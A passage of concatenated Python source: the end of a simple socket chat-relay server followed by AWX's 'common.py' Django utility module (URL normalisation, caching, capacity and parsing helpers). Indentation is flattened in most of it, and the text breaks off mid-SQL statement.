            print(message)
            chat(conn, message)
        except (ConnectionError, OSError):
            break
    conn.close()
def chat(conn, message):
#message += "\n"
for user in conns:
if user["conn"] != conn:
user["conn"].send(message.encode())
if __name__ == "__main__":
sock = socket.socket()
sock.bind(('', 9090))
sock.listen(10)
conns = []
threading.Thread(target=get_user).start()
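# Client-side sketch (an assumption, not part of this script): any plain TCP
# client can join the chat by connecting to port 9090 and exchanging UTF-8
# encoded messages; each message is relayed to every other connected client.
#
#     import socket
#     client = socket.socket()
#     client.connect(('127.0.0.1', 9090))
#     client.send('hello'.encode('utf-8'))
#     print(client.recv(4096).decode('utf-8'))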
|
common.py
|
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
from datetime import timedelta
import json
import yaml
import logging
import os
import subprocess
import re
import stat
import urllib.parse
import threading
import contextlib
import tempfile
import psutil
from functools import reduce, wraps
from decimal import Decimal
# Django
from django.core.exceptions import ObjectDoesNotExist, FieldDoesNotExist
from django.utils.dateparse import parse_datetime
from django.utils.translation import ugettext_lazy as _
from django.utils.functional import cached_property
from django.db import connection
from django.db.models.fields.related import ForeignObjectRel, ManyToManyField
from django.db.models.fields.related_descriptors import ForwardManyToOneDescriptor, ManyToManyDescriptor
from django.db.models.query import QuerySet
from django.db.models import Q
from django.db import connection as django_connection
from django.core.cache import cache as django_cache
# Django REST Framework
from rest_framework.exceptions import ParseError
from django.utils.encoding import smart_str
from django.utils.text import slugify
from django.utils.timezone import now
from django.apps import apps
# AWX
from awx.conf.license import get_license
logger = logging.getLogger('awx.main.utils')
__all__ = [
'get_object_or_400',
'camelcase_to_underscore',
'underscore_to_camelcase',
'memoize',
'memoize_delete',
'get_awx_http_client_headers',
'get_awx_version',
'update_scm_url',
'get_type_for_model',
'get_model_for_type',
'copy_model_by_class',
'copy_m2m_relationships',
'prefetch_page_capabilities',
'to_python_boolean',
'datetime_hook',
'ignore_inventory_computed_fields',
'ignore_inventory_group_removal',
'_inventory_updates',
'get_pk_from_dict',
'getattrd',
'getattr_dne',
'NoDefaultProvided',
'get_current_apps',
'set_current_apps',
'extract_ansible_vars',
'get_search_fields',
'get_system_task_capacity',
'get_cpu_capacity',
'get_mem_capacity',
'model_to_dict',
'NullablePromptPseudoField',
'model_instance_diff',
'parse_yaml_or_json',
'RequireDebugTrueOrTest',
'has_model_field_prefetched',
'set_environ',
'IllegalArgumentError',
'get_custom_venv_choices',
'get_external_account',
'task_manager_bulk_reschedule',
'schedule_task_manager',
'classproperty',
'create_temporary_fifo',
'truncate_stdout',
'deepmerge',
'get_event_partition_epoch',
'cleanup_new_process',
]
def get_object_or_400(klass, *args, **kwargs):
"""
Return a single object from the given model or queryset based on the query
    params, otherwise raise an exception that results in a 400 response.
"""
from django.shortcuts import _get_queryset
queryset = _get_queryset(klass)
try:
return queryset.get(*args, **kwargs)
except queryset.model.DoesNotExist as e:
raise ParseError(*e.args)
except queryset.model.MultipleObjectsReturned as e:
raise ParseError(*e.args)
def to_python_boolean(value, allow_none=False):
value = str(value)
if value.lower() in ('true', '1', 't'):
return True
elif value.lower() in ('false', '0', 'f'):
return False
elif allow_none and value.lower() in ('none', 'null'):
return None
else:
raise ValueError(_(u'Unable to convert "%s" to boolean') % value)
def datetime_hook(d):
new_d = {}
for key, value in d.items():
try:
new_d[key] = parse_datetime(value)
except TypeError:
new_d[key] = value
return new_d
def camelcase_to_underscore(s):
"""
Convert CamelCase names to lowercase_with_underscore.
"""
s = re.sub(r'(((?<=[a-z])[A-Z])|([A-Z](?![A-Z]|$)))', '_\\1', s)
return s.lower().strip('_')
def underscore_to_camelcase(s):
"""
Convert lowercase_with_underscore names to CamelCase.
"""
return ''.join(x.capitalize() or '_' for x in s.split('_'))
class RequireDebugTrueOrTest(logging.Filter):
"""
Logging filter to output when in DEBUG mode or running tests.
"""
def filter(self, record):
from django.conf import settings
return settings.DEBUG or settings.IS_TESTING()
class IllegalArgumentError(ValueError):
pass
def get_memoize_cache():
from django.core.cache import cache
return cache
def memoize(ttl=60, cache_key=None, track_function=False, cache=None):
"""
Decorator to wrap a function and cache its result.
"""
if cache_key and track_function:
raise IllegalArgumentError("Can not specify cache_key when track_function is True")
cache = cache or get_memoize_cache()
def memoize_decorator(f):
@wraps(f)
def _memoizer(*args, **kwargs):
if track_function:
cache_dict_key = slugify('%r %r' % (args, kwargs))
key = slugify("%s" % f.__name__)
cache_dict = cache.get(key) or dict()
if cache_dict_key not in cache_dict:
value = f(*args, **kwargs)
cache_dict[cache_dict_key] = value
cache.set(key, cache_dict, ttl)
else:
value = cache_dict[cache_dict_key]
else:
key = cache_key or slugify('%s %r %r' % (f.__name__, args, kwargs))
value = cache.get(key)
if value is None:
value = f(*args, **kwargs)
cache.set(key, value, ttl)
return value
return _memoizer
return memoize_decorator
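# Usage sketch (an assumption; `expensive_lookup` and `compute_something` are
# hypothetical): with track_function=True the cache key is derived from the
# function name plus the slugified call arguments, so repeated calls within
# the TTL are served from the cache.
#
#     >>> @memoize(ttl=300, track_function=True)
#     ... def expensive_lookup(name):
#     ...     return compute_something(name)   # hypothetical helper
#     >>> expensive_lookup('foo')  # first call computes and caches
#     >>> expensive_lookup('foo')  # second call within 300s returns the cached value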
def memoize_delete(function_name):
cache = get_memoize_cache()
return cache.delete(function_name)
@memoize(ttl=3600 * 24) # in practice, we only need this to load once at process startup time
def get_event_partition_epoch():
from django.db.migrations.recorder import MigrationRecorder
return MigrationRecorder.Migration.objects.filter(app='main', name='0144_event_partitions').first().applied
@memoize()
def get_ansible_version():
"""
    Return the Ansible version installed on the system,
    or 'unknown' if it cannot be determined.
"""
try:
proc = subprocess.Popen(['ansible', '--version'], stdout=subprocess.PIPE)
result = smart_str(proc.communicate()[0])
return result.split('\n')[0].replace('ansible', '').strip()
except Exception:
return 'unknown'
def get_awx_version():
"""
Return AWX version as reported by setuptools.
"""
from awx import __version__
try:
import pkg_resources
return pkg_resources.require('awx')[0].version
except Exception:
return __version__
def get_awx_http_client_headers():
license = get_license().get('license_type', 'UNLICENSED')
headers = {
'Content-Type': 'application/json',
'User-Agent': '{} {} ({})'.format('AWX' if license == 'open' else 'Red Hat Ansible Automation Platform', get_awx_version(), license),
}
return headers
def update_scm_url(scm_type, url, username=True, password=True, check_special_cases=True, scp_format=False):
"""
Update the given SCM URL to add/replace/remove the username/password. When
username/password is True, preserve existing username/password, when
False (None, '', etc.), remove any existing username/password, otherwise
replace username/password. Also validates the given URL.
"""
# Handle all of the URL formats supported by the SCM systems:
# git: https://www.kernel.org/pub/software/scm/git/docs/git-clone.html#URLS
# svn: http://svnbook.red-bean.com/en/1.7/svn-book.html#svn.advanced.reposurls
if scm_type not in ('git', 'svn', 'insights', 'archive'):
raise ValueError(_('Unsupported SCM type "%s"') % str(scm_type))
if not url.strip():
return ''
parts = urllib.parse.urlsplit(url)
try:
parts.port
except ValueError:
raise ValueError(_('Invalid %s URL') % scm_type)
if parts.scheme == 'git+ssh' and not scp_format:
raise ValueError(_('Unsupported %s URL') % scm_type)
if '://' not in url:
# Handle SCP-style URLs for git (e.g. [user@]host.xz:path/to/repo.git/).
if scm_type == 'git' and ':' in url:
if '@' in url:
userpass, hostpath = url.split('@', 1)
else:
userpass, hostpath = '', url
if hostpath.count(':') > 1:
raise ValueError(_('Invalid %s URL') % scm_type)
host, path = hostpath.split(':', 1)
# if not path.startswith('/') and not path.startswith('~/'):
# path = '~/%s' % path
# if path.startswith('/'):
# path = path.lstrip('/')
hostpath = '/'.join([host, path])
modified_url = '@'.join(filter(None, [userpass, hostpath]))
# git+ssh scheme identifies URLs that should be converted back to
# SCP style before passed to git module.
parts = urllib.parse.urlsplit('git+ssh://%s' % modified_url)
# Handle local paths specified without file scheme (e.g. /path/to/foo).
# Only supported by git.
elif scm_type == 'git':
if not url.startswith('/'):
parts = urllib.parse.urlsplit('file:///%s' % url)
else:
parts = urllib.parse.urlsplit('file://%s' % url)
else:
raise ValueError(_('Invalid %s URL') % scm_type)
# Validate that scheme is valid for given scm_type.
scm_type_schemes = {
'git': ('ssh', 'git', 'git+ssh', 'http', 'https', 'ftp', 'ftps', 'file'),
'svn': ('http', 'https', 'svn', 'svn+ssh', 'file'),
'insights': ('http', 'https'),
'archive': ('http', 'https'),
}
if parts.scheme not in scm_type_schemes.get(scm_type, ()):
raise ValueError(_('Unsupported %s URL') % scm_type)
if parts.scheme == 'file' and parts.netloc not in ('', 'localhost'):
raise ValueError(_('Unsupported host "%s" for file:// URL') % (parts.netloc))
elif parts.scheme != 'file' and not parts.netloc:
raise ValueError(_('Host is required for %s URL') % parts.scheme)
if username is True:
netloc_username = parts.username or ''
elif username:
netloc_username = username
else:
netloc_username = ''
if password is True:
netloc_password = parts.password or ''
elif password:
netloc_password = password
else:
netloc_password = ''
# Special handling for github/bitbucket SSH URLs.
if check_special_cases:
special_git_hosts = ('github.com', 'bitbucket.org', 'altssh.bitbucket.org')
if scm_type == 'git' and parts.scheme.endswith('ssh') and parts.hostname in special_git_hosts and netloc_username != 'git':
raise ValueError(_('Username must be "git" for SSH access to %s.') % parts.hostname)
if scm_type == 'git' and parts.scheme.endswith('ssh') and parts.hostname in special_git_hosts and netloc_password:
# raise ValueError('Password not allowed for SSH access to %s.' % parts.hostname)
netloc_password = ''
if netloc_username and parts.scheme != 'file' and scm_type not in ("insights", "archive"):
netloc = u':'.join([urllib.parse.quote(x, safe='') for x in (netloc_username, netloc_password) if x])
else:
netloc = u''
netloc = u'@'.join(filter(None, [netloc, parts.hostname]))
if parts.port:
netloc = u':'.join([netloc, str(parts.port)])
new_url = urllib.parse.urlunsplit([parts.scheme, netloc, parts.path, parts.query, parts.fragment])
if scp_format and parts.scheme == 'git+ssh':
new_url = new_url.replace('git+ssh://', '', 1).replace('/', ':', 1)
return new_url
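# Example sketch (an assumption, traced from the code above rather than taken
# from AWX documentation): an SCP-style git URL is normalized to the internal
# git+ssh form, and scp_format=True converts it back for consumption by git.
#
#     >>> update_scm_url('git', 'git@github.com:ansible/awx.git')
#     'git+ssh://git@github.com/ansible/awx.git'
#     >>> update_scm_url('git', 'git@github.com:ansible/awx.git', scp_format=True)
#     'git@github.com:ansible/awx.git'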
def get_allowed_fields(obj, serializer_mapping):
if serializer_mapping is not None and obj.__class__ in serializer_mapping:
serializer_actual = serializer_mapping[obj.__class__]()
allowed_fields = [x for x in serializer_actual.fields if not serializer_actual.fields[x].read_only] + ['id']
else:
allowed_fields = [x.name for x in obj._meta.fields]
ACTIVITY_STREAM_FIELD_EXCLUSIONS = {'user': ['last_login'], 'oauth2accesstoken': ['last_used'], 'oauth2application': ['client_secret']}
model_name = obj._meta.model_name
fields_excluded = ACTIVITY_STREAM_FIELD_EXCLUSIONS.get(model_name, [])
# see definition of from_db for CredentialType
# injection logic of any managed types are incompatible with activity stream
if model_name == 'credentialtype' and obj.managed and obj.namespace:
fields_excluded.extend(['inputs', 'injectors'])
if fields_excluded:
allowed_fields = [f for f in allowed_fields if f not in fields_excluded]
return allowed_fields
def _convert_model_field_for_display(obj, field_name, password_fields=None):
# NOTE: Careful modifying the value of field_val, as it could modify
# underlying model object field value also.
try:
field_val = getattr(obj, field_name, None)
except ObjectDoesNotExist:
return '<missing {}>-{}'.format(obj._meta.verbose_name, getattr(obj, '{}_id'.format(field_name)))
if password_fields is None:
password_fields = set(getattr(type(obj), 'PASSWORD_FIELDS', [])) | set(['password'])
if field_name in password_fields or (isinstance(field_val, str) and field_val.startswith('$encrypted$')):
return u'hidden'
if hasattr(obj, 'display_%s' % field_name):
field_val = getattr(obj, 'display_%s' % field_name)()
if isinstance(field_val, (list, dict)):
try:
field_val = json.dumps(field_val, ensure_ascii=False)
except Exception:
pass
if type(field_val) not in (bool, int, type(None)):
field_val = smart_str(field_val)
return field_val
def model_instance_diff(old, new, serializer_mapping=None):
"""
Calculate the differences between two model instances. One of the instances may be None (i.e., a newly
created model or deleted model). This will cause all fields with a value to have changed (from None).
    serializer_mapping is used to determine read-only fields.
    When provided, read-only fields will not be included in the resulting dictionary.
"""
from django.db.models import Model
if not (old is None or isinstance(old, Model)):
raise TypeError('The supplied old instance is not a valid model instance.')
if not (new is None or isinstance(new, Model)):
raise TypeError('The supplied new instance is not a valid model instance.')
old_password_fields = set(getattr(type(old), 'PASSWORD_FIELDS', [])) | set(['password'])
new_password_fields = set(getattr(type(new), 'PASSWORD_FIELDS', [])) | set(['password'])
diff = {}
allowed_fields = get_allowed_fields(new, serializer_mapping)
for field in allowed_fields:
old_value = getattr(old, field, None)
new_value = getattr(new, field, None)
if old_value != new_value:
diff[field] = (
_convert_model_field_for_display(old, field, password_fields=old_password_fields),
_convert_model_field_for_display(new, field, password_fields=new_password_fields),
)
if len(diff) == 0:
diff = None
return diff
def model_to_dict(obj, serializer_mapping=None):
"""
    Serialize a model instance to a dictionary as best as possible.
    serializer_mapping is used to determine read-only fields.
    When provided, read-only fields will not be included in the resulting dictionary.
"""
password_fields = set(getattr(type(obj), 'PASSWORD_FIELDS', [])) | set(['password'])
attr_d = {}
allowed_fields = get_allowed_fields(obj, serializer_mapping)
for field_name in allowed_fields:
attr_d[field_name] = _convert_model_field_for_display(obj, field_name, password_fields=password_fields)
return attr_d
class CharPromptDescriptor:
"""Class used for identifying nullable launch config fields from class
ex. Schedule.limit
"""
def __init__(self, field):
self.field = field
class NullablePromptPseudoField:
"""
Interface for pseudo-property stored in `char_prompts` dict
Used in LaunchTimeConfig and submodels, defined here to avoid circular imports
"""
def __init__(self, field_name):
self.field_name = field_name
@cached_property
def field_descriptor(self):
return CharPromptDescriptor(self)
def __get__(self, instance, type=None):
if instance is None:
# for inspection on class itself
return self.field_descriptor
return instance.char_prompts.get(self.field_name, None)
def __set__(self, instance, value):
if value in (None, {}):
instance.char_prompts.pop(self.field_name, None)
else:
instance.char_prompts[self.field_name] = value
def copy_model_by_class(obj1, Class2, fields, kwargs):
"""
    Creates a new unsaved object of type Class2 using the fields from obj1;
    values in kwargs can override the values taken from obj1.
"""
create_kwargs = {}
for field_name in fields:
descriptor = getattr(Class2, field_name)
if isinstance(descriptor, ForwardManyToOneDescriptor): # ForeignKey
# Foreign keys can be specified as field_name or field_name_id.
id_field_name = '%s_id' % field_name
if field_name in kwargs:
value = kwargs[field_name]
elif id_field_name in kwargs:
value = kwargs[id_field_name]
else:
value = getattr(obj1, id_field_name)
if hasattr(value, 'id'):
value = value.id
create_kwargs[id_field_name] = value
elif isinstance(descriptor, CharPromptDescriptor):
# difficult case of copying one launch config to another launch config
new_val = None
if field_name in kwargs:
new_val = kwargs[field_name]
elif hasattr(obj1, 'char_prompts'):
if field_name in obj1.char_prompts:
new_val = obj1.char_prompts[field_name]
elif hasattr(obj1, field_name):
# extremely rare case where a template spawns a launch config - sliced jobs
new_val = getattr(obj1, field_name)
if new_val is not None:
create_kwargs.setdefault('char_prompts', {})
create_kwargs['char_prompts'][field_name] = new_val
elif isinstance(descriptor, ManyToManyDescriptor):
continue # not copied in this method
elif field_name in kwargs:
if field_name == 'extra_vars' and isinstance(kwargs[field_name], dict):
create_kwargs[field_name] = json.dumps(kwargs['extra_vars'])
elif not isinstance(Class2._meta.get_field(field_name), (ForeignObjectRel, ManyToManyField)):
create_kwargs[field_name] = kwargs[field_name]
elif hasattr(obj1, field_name):
create_kwargs[field_name] = getattr(obj1, field_name)
# Apply class-specific extra processing for origination of unified jobs
if hasattr(obj1, '_update_unified_job_kwargs') and obj1.__class__ != Class2:
new_kwargs = obj1._update_unified_job_kwargs(create_kwargs, kwargs)
else:
new_kwargs = create_kwargs
return Class2(**new_kwargs)
def copy_m2m_relationships(obj1, obj2, fields, kwargs=None):
"""
In-place operation.
    Given two saved objects, copies related objects from obj1
    to the field of the same name on obj2, for each field in `fields`.
"""
for field_name in fields:
if hasattr(obj1, field_name):
try:
field_obj = obj1._meta.get_field(field_name)
except FieldDoesNotExist:
continue
if isinstance(field_obj, ManyToManyField):
# Many to Many can be specified as field_name
src_field_value = getattr(obj1, field_name)
if kwargs and field_name in kwargs:
override_field_val = kwargs[field_name]
if isinstance(override_field_val, (set, list, QuerySet)):
getattr(obj2, field_name).add(*override_field_val)
continue
if override_field_val.__class__.__name__ == 'ManyRelatedManager':
src_field_value = override_field_val
dest_field = getattr(obj2, field_name)
dest_field.add(*list(src_field_value.all().values_list('id', flat=True)))
def get_type_for_model(model):
"""
Return type name for a given model class.
"""
opts = model._meta.concrete_model._meta
return camelcase_to_underscore(opts.object_name)
def get_model_for_type(type_name):
"""
Return model class for a given type name.
"""
model_str = underscore_to_camelcase(type_name)
if model_str == 'User':
use_app = 'auth'
else:
use_app = 'main'
return apps.get_model(use_app, model_str)
def prefetch_page_capabilities(model, page, prefetch_list, user):
"""
Given a `page` list of objects, a nested dictionary of user_capabilities
are returned by id, ex.
{
4: {'edit': True, 'start': True},
6: {'edit': False, 'start': False}
}
Each capability is produced for all items in the page in a single query
Examples of prefetch language:
prefetch_list = ['admin', 'execute']
--> prefetch the admin (edit) and execute (start) permissions for
items in list for current user
prefetch_list = ['inventory.admin']
--> prefetch the related inventory FK permissions for current user,
and put it into the object's cache
prefetch_list = [{'copy': ['inventory.admin', 'project.admin']}]
--> prefetch logical combination of admin permission to inventory AND
project, put into cache dictionary as "copy"
"""
page_ids = [obj.id for obj in page]
mapping = {}
for obj in page:
mapping[obj.id] = {}
for prefetch_entry in prefetch_list:
display_method = None
if type(prefetch_entry) is dict:
display_method = list(prefetch_entry.keys())[0]
paths = prefetch_entry[display_method]
else:
paths = prefetch_entry
if type(paths) is not list:
paths = [paths]
# Build the query for accessible_objects according the user & role(s)
filter_args = []
for role_path in paths:
if '.' in role_path:
res_path = '__'.join(role_path.split('.')[:-1])
role_type = role_path.split('.')[-1]
parent_model = model
for subpath in role_path.split('.')[:-1]:
parent_model = parent_model._meta.get_field(subpath).related_model
filter_args.append(
Q(Q(**{'%s__pk__in' % res_path: parent_model.accessible_pk_qs(user, '%s_role' % role_type)}) | Q(**{'%s__isnull' % res_path: True}))
)
else:
role_type = role_path
filter_args.append(Q(**{'pk__in': model.accessible_pk_qs(user, '%s_role' % role_type)}))
if display_method is None:
# Role name translation to UI names for methods
display_method = role_type
if role_type == 'admin':
display_method = 'edit'
elif role_type in ['execute', 'update']:
display_method = 'start'
# Union that query with the list of items on page
filter_args.append(Q(pk__in=page_ids))
ids_with_role = set(model.objects.filter(*filter_args).values_list('pk', flat=True))
# Save data item-by-item
for obj in page:
mapping[obj.pk][display_method] = bool(obj.pk in ids_with_role)
return mapping
def validate_vars_type(vars_obj):
if not isinstance(vars_obj, dict):
vars_type = type(vars_obj)
if hasattr(vars_type, '__name__'):
data_type = vars_type.__name__
else:
data_type = str(vars_type)
raise AssertionError(_('Input type `{data_type}` is not a dictionary').format(data_type=data_type))
def parse_yaml_or_json(vars_str, silent_failure=True):
"""
Attempt to parse a string of variables.
    First with the JSON parser; if that fails, then with PyYAML.
    If both attempts fail, return an empty dictionary if `silent_failure`
    is True, or re-raise a combined error if `silent_failure` is False.
"""
if isinstance(vars_str, dict):
return vars_str
elif isinstance(vars_str, str) and vars_str == '""':
return {}
try:
vars_dict = json.loads(vars_str)
validate_vars_type(vars_dict)
except (ValueError, TypeError, AssertionError) as json_err:
try:
vars_dict = yaml.safe_load(vars_str)
# Can be None if '---'
if vars_dict is None:
vars_dict = {}
validate_vars_type(vars_dict)
if not silent_failure:
# is valid YAML, check that it is compatible with JSON
try:
json.dumps(vars_dict)
except (ValueError, TypeError, AssertionError) as json_err2:
raise ParseError(_('Variables not compatible with JSON standard (error: {json_error})').format(json_error=str(json_err2)))
except (yaml.YAMLError, TypeError, AttributeError, AssertionError) as yaml_err:
if silent_failure:
return {}
raise ParseError(
_('Cannot parse as JSON (error: {json_error}) or ' 'YAML (error: {yaml_error}).').format(json_error=str(json_err), yaml_error=str(yaml_err))
)
return vars_dict
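# Example sketch (an assumption based on the logic above): JSON is tried first,
# then YAML; un-parseable or non-dict input silently yields an empty dict
# unless silent_failure=False.
#
#     >>> parse_yaml_or_json('{"a": 1}')
#     {'a': 1}
#     >>> parse_yaml_or_json('a: 1')
#     {'a': 1}
#     >>> parse_yaml_or_json('just a plain string')
#     {}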
def get_cpu_capacity():
from django.conf import settings
settings_forkcpu = getattr(settings, 'SYSTEM_TASK_FORKS_CPU', None)
env_forkcpu = os.getenv('SYSTEM_TASK_FORKS_CPU', None)
settings_abscpu = getattr(settings, 'SYSTEM_TASK_ABS_CPU', None)
env_abscpu = os.getenv('SYSTEM_TASK_ABS_CPU', None)
if env_abscpu is not None:
return 0, int(env_abscpu)
elif settings_abscpu is not None:
return 0, int(settings_abscpu)
cpu = psutil.cpu_count()
if env_forkcpu:
forkcpu = int(env_forkcpu)
elif settings_forkcpu:
forkcpu = int(settings_forkcpu)
else:
forkcpu = 4
return (cpu, cpu * forkcpu)
def get_mem_capacity():
from django.conf import settings
settings_forkmem = getattr(settings, 'SYSTEM_TASK_FORKS_MEM', None)
env_forkmem = os.getenv('SYSTEM_TASK_FORKS_MEM', None)
settings_absmem = getattr(settings, 'SYSTEM_TASK_ABS_MEM', None)
env_absmem = os.getenv('SYSTEM_TASK_ABS_MEM', None)
if env_absmem is not None:
return 0, int(env_absmem)
elif settings_absmem is not None:
return 0, int(settings_absmem)
if env_forkmem:
forkmem = int(env_forkmem)
elif settings_forkmem:
forkmem = int(settings_forkmem)
else:
forkmem = 100
mem = psutil.virtual_memory().total
return (mem, max(1, ((mem // 1024 // 1024) - 2048) // forkmem))
def get_system_task_capacity(scale=Decimal(1.0), cpu_capacity=None, mem_capacity=None):
"""
    Measure system CPU and memory and use them as a baseline for determining the system's task capacity
"""
from django.conf import settings
settings_forks = getattr(settings, 'SYSTEM_TASK_FORKS_CAPACITY', None)
env_forks = os.getenv('SYSTEM_TASK_FORKS_CAPACITY', None)
if env_forks:
return int(env_forks)
elif settings_forks:
return int(settings_forks)
if cpu_capacity is None:
_, cpu_cap = get_cpu_capacity()
else:
cpu_cap = cpu_capacity
if mem_capacity is None:
_, mem_cap = get_mem_capacity()
else:
mem_cap = mem_capacity
return min(mem_cap, cpu_cap) + ((max(mem_cap, cpu_cap) - min(mem_cap, cpu_cap)) * scale)
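# Worked example (an assumption, following the formulas above): on a host with
# 8 CPUs and 16384 MB of RAM using the default multipliers, CPU capacity is
# 8 * 4 = 32 forks and memory capacity is (16384 - 2048) // 100 = 143 forks,
# so with scale=1.0 the task capacity is min(143, 32) + (143 - 32) * 1.0 = 143.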
_inventory_updates = threading.local()
_task_manager = threading.local()
@contextlib.contextmanager
def ignore_inventory_computed_fields():
"""
Context manager to ignore updating inventory computed fields.
"""
try:
previous_value = getattr(_inventory_updates, 'is_updating', False)
_inventory_updates.is_updating = True
yield
finally:
_inventory_updates.is_updating = previous_value
def _schedule_task_manager():
from awx.main.scheduler.tasks import run_task_manager
from django.db import connection
# runs right away if not in transaction
connection.on_commit(lambda: run_task_manager.delay())
@contextlib.contextmanager
def task_manager_bulk_reschedule():
"""Context manager to avoid submitting task multiple times."""
try:
previous_flag = getattr(_task_manager, 'bulk_reschedule', False)
previous_value = getattr(_task_manager, 'needs_scheduling', False)
_task_manager.bulk_reschedule = True
_task_manager.needs_scheduling = False
yield
finally:
_task_manager.bulk_reschedule = previous_flag
if _task_manager.needs_scheduling:
_schedule_task_manager()
_task_manager.needs_scheduling = previous_value
def schedule_task_manager():
if getattr(_task_manager, 'bulk_reschedule', False):
_task_manager.needs_scheduling = True
return
_schedule_task_manager()
@contextlib.contextmanager
def ignore_inventory_group_removal():
"""
Context manager to ignore moving groups/hosts when group is deleted.
"""
try:
previous_value = getattr(_inventory_updates, 'is_removing', False)
_inventory_updates.is_removing = True
yield
finally:
_inventory_updates.is_removing = previous_value
@contextlib.contextmanager
def set_environ(**environ):
"""
Temporarily set the process environment variables.
>>> with set_environ(FOO='BAR'):
... assert os.environ['FOO'] == 'BAR'
"""
old_environ = os.environ.copy()
try:
os.environ.update(environ)
yield
finally:
os.environ.clear()
os.environ.update(old_environ)
def get_pk_from_dict(_dict, key):
"""
Helper for obtaining a pk from user data dict or None if not present.
"""
try:
val = _dict[key]
if isinstance(val, object) and hasattr(val, 'id'):
return val.id # return id if given model object
return int(val)
except (TypeError, KeyError, ValueError):
return None
class NoDefaultProvided(object):
pass
def getattrd(obj, name, default=NoDefaultProvided):
"""
Same as getattr(), but allows dot notation lookup
Discussed in:
http://stackoverflow.com/questions/11975781
"""
try:
return reduce(getattr, name.split("."), obj)
except AttributeError:
if default != NoDefaultProvided:
return default
raise
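# Example sketch (an assumption; `job` and the attribute chain are hypothetical
# objects): dotted lookups walk the attribute chain, and `default` is returned
# only when some link in the chain is missing.
#
#     >>> getattrd(job, 'project.organization.name', default=None)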
def getattr_dne(obj, name, notfound=ObjectDoesNotExist):
try:
return getattr(obj, name)
except notfound:
return None
current_apps = apps
def set_current_apps(apps):
global current_apps
current_apps = apps
def get_current_apps():
global current_apps
return current_apps
def get_custom_venv_choices():
from django.conf import settings
all_venv_paths = settings.CUSTOM_VENV_PATHS + [settings.BASE_VENV_PATH]
custom_venv_choices = []
for venv_path in all_venv_paths:
if os.path.exists(venv_path):
for d in os.listdir(venv_path):
if venv_path == settings.BASE_VENV_PATH and d == 'awx':
continue
if os.path.exists(os.path.join(venv_path, d, 'bin', 'pip')):
custom_venv_choices.append(os.path.join(venv_path, d))
return custom_venv_choices
def get_custom_venv_pip_freeze(venv_path):
pip_path = os.path.join(venv_path, 'bin', 'pip')
try:
freeze_data = subprocess.run([pip_path, "freeze"], capture_output=True)
pip_data = (freeze_data.stdout).decode('UTF-8')
return pip_data
except Exception:
logger.exception("Encountered an error while trying to run 'pip freeze' for custom virtual environments:")
def is_ansible_variable(key):
return key.startswith('ansible_')
def extract_ansible_vars(extra_vars):
extra_vars = parse_yaml_or_json(extra_vars)
ansible_vars = set([])
for key in list(extra_vars.keys()):
if is_ansible_variable(key):
extra_vars.pop(key)
ansible_vars.add(key)
return (extra_vars, ansible_vars)
def get_search_fields(model):
fields = []
for field in model._meta.fields:
if field.name in ('username', 'first_name', 'last_name', 'email', 'name', 'description'):
fields.append(field.name)
return fields
def has_model_field_prefetched(model_obj, field_name):
# NOTE: Update this function if django internal implementation changes.
return getattr(getattr(model_obj, field_name, None), 'prefetch_cache_name', '') in getattr(model_obj, '_prefetched_objects_cache', {})
def get_external_account(user):
from django.conf import settings
account_type = None
if getattr(settings, 'AUTH_LDAP_SERVER_URI', None):
try:
if user.pk and user.profile.ldap_dn and not user.has_usable_password():
account_type = "ldap"
except AttributeError:
pass
if (
getattr(settings, 'SOCIAL_AUTH_GOOGLE_OAUTH2_KEY', None)
or getattr(settings, 'SOCIAL_AUTH_GITHUB_KEY', None)
or getattr(settings, 'SOCIAL_AUTH_GITHUB_ORG_KEY', None)
or getattr(settings, 'SOCIAL_AUTH_GITHUB_TEAM_KEY', None)
or getattr(settings, 'SOCIAL_AUTH_SAML_ENABLED_IDPS', None)
) and user.social_auth.all():
account_type = "social"
if (getattr(settings, 'RADIUS_SERVER', None) or getattr(settings, 'TACACSPLUS_HOST', None)) and user.enterprise_auth.all():
account_type = "enterprise"
return account_type
class classproperty:
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.fget = fget
self.fset = fset
self.fdel = fdel
if doc is None and fget is not None:
doc = fget.__doc__
self.__doc__ = doc
def __get__(self, instance, ownerclass):
return self.fget(ownerclass)
def create_temporary_fifo(data):
"""Open fifo named pipe in a new thread using a temporary file path. The
thread blocks until data is read from the pipe.
Returns the path to the fifo.
:param data(bytes): Data to write to the pipe.
"""
path = os.path.join(tempfile.mkdtemp(), next(tempfile._get_candidate_names()))
os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)
threading.Thread(target=lambda p, d: open(p, 'wb').write(d), args=(path, data)).start()
return path
def truncate_stdout(stdout, size):
from awx.main.constants import ANSI_SGR_PATTERN
if size <= 0 or len(stdout) <= size:
return stdout
stdout = stdout[: (size - 1)] + u'\u2026'
set_count, reset_count = 0, 0
for m in ANSI_SGR_PATTERN.finditer(stdout):
if m.group() == u'\u001b[0m':
reset_count += 1
else:
set_count += 1
return stdout + u'\u001b[0m' * (set_count - reset_count)
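# Example sketch (an assumption): output longer than `size` is cut to size - 1
# characters plus an ellipsis, and any ANSI SGR sequences left open in the kept
# prefix are closed with reset codes so terminal colors do not leak.
#
#     >>> truncate_stdout(u'hello world', 6)
#     'hello…'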
def deepmerge(a, b):
"""
Merge dict structures and return the result.
>>> a = {'first': {'all_rows': {'pass': 'dog', 'number': '1'}}}
>>> b = {'first': {'all_rows': {'fail': 'cat', 'number': '5'}}}
>>> import pprint; pprint.pprint(deepmerge(a, b))
{'first': {'all_rows': {'fail': 'cat', 'number': '5', 'pass': 'dog'}}}
"""
if isinstance(a, dict) and isinstance(b, dict):
return dict([(k, deepmerge(a.get(k), b.get(k))) for k in set(a.keys()).union(b.keys())])
elif b is None:
return a
else:
return b
def create_partition(tblname, start=None, end=None, partition_label=None, minutely=False):
"""Creates new partition table for events.
- start defaults to beginning of current hour
- end defaults to end of current hour
- partition_label defaults to YYYYMMDD_HH
- minutely will create partitions that span _a single minute_ for testing purposes
"""
current_time = now()
if not start:
if minutely:
start = current_time.replace(microsecond=0, second=0)
else:
start = current_time.replace(microsecond=0, second=0, minute=0)
if not end:
if minutely:
end = start.replace(microsecond=0, second=0) + timedelta(minutes=1)
else:
end = start.replace(microsecond=0, second=0, minute=0) + timedelta(hours=1)
start_timestamp = str(start)
end_timestamp = str(end)
if not partition_label:
if minutely:
partition_label = start.strftime('%Y%m%d_%H%M')
else:
partition_label = start.strftime('%Y%m%d_%H')
with connection.cursor() as cursor:
cursor.execute(
f'CREATE TABLE IF NOT EXISTS {tblname}_{partition_label} '
